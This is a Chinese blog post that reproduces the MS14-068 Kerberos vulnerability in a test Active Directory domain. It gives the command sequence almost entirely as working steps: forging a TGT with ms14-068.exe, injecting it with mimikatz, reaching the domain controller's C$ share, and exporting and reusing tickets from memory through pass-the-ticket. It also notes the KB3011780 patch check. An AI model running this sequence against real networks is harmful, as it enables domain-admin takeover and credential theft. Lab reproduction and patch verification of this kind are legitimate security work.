MS14-068复现

kerberos认证流程非常的重要

1、生成TGT:

net config workstation

在这里插入图片描述

ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top

在这里插入图片描述
生成的票据:
在这里插入图片描述

2、注入TGT:

1)先查看自己的klist 如果有的话 那么先清理掉 否则可能会导致无法成功

klist

在这里插入图片描述
清理原来的票据:klist purge
在这里插入图片描述
在这里插入图片描述
原因:https://www.t00ls.net/viewthread.php?tid=28727

2)利用mimikatz进行注入

非交互式中直接执行一句话
mimikatz.exe "kerberos::ptc TGT_yuyonghu01@top.pentest.top.ccache" exit

注入成功!
在这里插入图片描述

查看票据:

klist

在这里插入图片描述
尝试访问域服务器

dir \\WIN-CKT0M35R6UO.top.pentest.top\c$

在这里插入图片描述
漏洞:MS14-068 补丁编号kb3011780

查看是否打补丁:systeminfo |find "3011780"

Export the ticket:

在我们成功获得域控权限后,就可以导出域控内存中的Ticket,在默认的10个小时以内都可以利用来登录域控

通过mimikatz导出内存中的Ticket,执行:

sekurlsa::tickets /export

如图:
在这里插入图片描述

挑选其中的[0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kribi在域普通用户的主机进行导入

在这里插入图片描述

导入:

mimikatz "kerberos::ptt [0;7d8508]-2-0-60a00000-yuyonghu01@krbtgt-TOP.PENTEST.TOP.kirbi"

在这里插入图片描述
尝试访问域控服务器:

dir \\WIN-CKT0M35R6UO.top.pentest.top\c$

成功!
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值